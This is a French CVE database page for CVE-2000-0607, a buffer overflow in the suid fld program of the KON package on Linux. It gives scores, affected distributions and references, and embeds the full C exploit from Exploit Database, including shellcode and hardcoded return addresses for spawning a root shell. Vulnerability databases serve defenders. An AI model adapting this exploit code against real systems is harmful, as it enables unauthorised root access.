CVE-2000-0607 : Détail

CVE-2000-0607

0.04%V3
Local
2000-07-19
02h00 +00:00
2003-03-21
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in fld program in Kanji on Console (KON) package on Linux may allow local users to gain root privileges via an input file containing long CHARSET_REGISTRY or CHARSET_ENCODING settings.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 20024

Date de publication : 2000-07-31 22h00 +00:00
Auteur : E-Ligth
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/1371/info KON (Kanji On Console) is a package for displaying Kanji text under Linux and comes with two suid binaries which are vulnerable to buffer overflows. "fld", one of the vulnerable programs, accepts options input from a text file. Through this mechanism it is possible to input arbitrary code into the stack and spawn a root shell. The other binary, kon, suffers from a buffer overflow as well. The buffer overflow in kon can be exploited via the -StartupMessage command line option, and fld via the command line options: -t bdf <file to be read> */ /* Exploit code for /usr/bin/fld Compile with : gcc -o xp xp.c Made by : E-Ligth (Hugo Oliveira Dias) 01/08/2000 */ #include <string.h> #include <stdlib.h> #include <stdio.h> #define OFFSET 0 #define BUFFSIZE 541 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/zh"; unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } int main(int argc,char *argv[]) { int bsize = BUFFSIZE; int offset = OFFSET; int i; long *addr_ptr, addr; char *ptr,*buf,*env; char arg[30]; if (!(buf = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } ptr = buf; for (i = 0; i < bsize; i++) *(ptr++) = shellcode[i]; buf[519] = 0x3c; /* Saved EBP 0xbffffa3c */ buf[520] = 0xfa; buf[521] = 0xff; buf[522] = 0xbf; buf[523] = 0x10; /* Return Address 0xbffff710 */ buf[524] = 0xf7; buf[525] = 0xff; buf[526] = 0xbf; buf[527] = 0x90; /* fp variable 0x804bf90 */ buf[528] = 0xbf; buf[529] = 0x04; buf[530] = 0x08; buf[531] = 0xef; /* variable thats shouldn�t be destroyed 0xbffffbef */ buf[532] = 0xfb; buf[533] = 0xff; buf[534] = 0xbf; buf[535] = 0x60; /* variable thats shouldn�t be destroyed 0x40013460 */ buf[536] = 0x34; buf[537] = 0x01; buf[538] = 0x40; memcpy(buf,"-type \"",7); buf[540] = '\0'; buf[539] = '\"'; memcpy(arg,"-type bdf ./code",16); arg[16] = '\0'; env = (char *) malloc(bsize + 10); memcpy(env,"EGG=",4); strcat(env,buf); putenv(env); system("/bin/bash"); exit(0);

Products Mentioned

Configuraton 0

Debian>>Debian_linux >> Version 2.0

Debian>>Debian_linux >> Version 2.1

Debian>>Debian_linux >> Version 2.2

Debian>>Debian_linux >> Version 2.3

Mandrakesoft>>Mandrake_linux >> Version 6.1

Mandrakesoft>>Mandrake_linux >> Version 7.0

Mandrakesoft>>Mandrake_linux >> Version 7.1

Redhat>>Linux >> Version 5.0

Redhat>>Linux >> Version 5.1

Redhat>>Linux >> Version 5.2

Redhat>>Linux >> Version 6.1

Redhat>>Linux >> Version 6.2

Références

http://www.securityfocus.com/bid/1371
Tags : vdb-entry, x_refsource_BID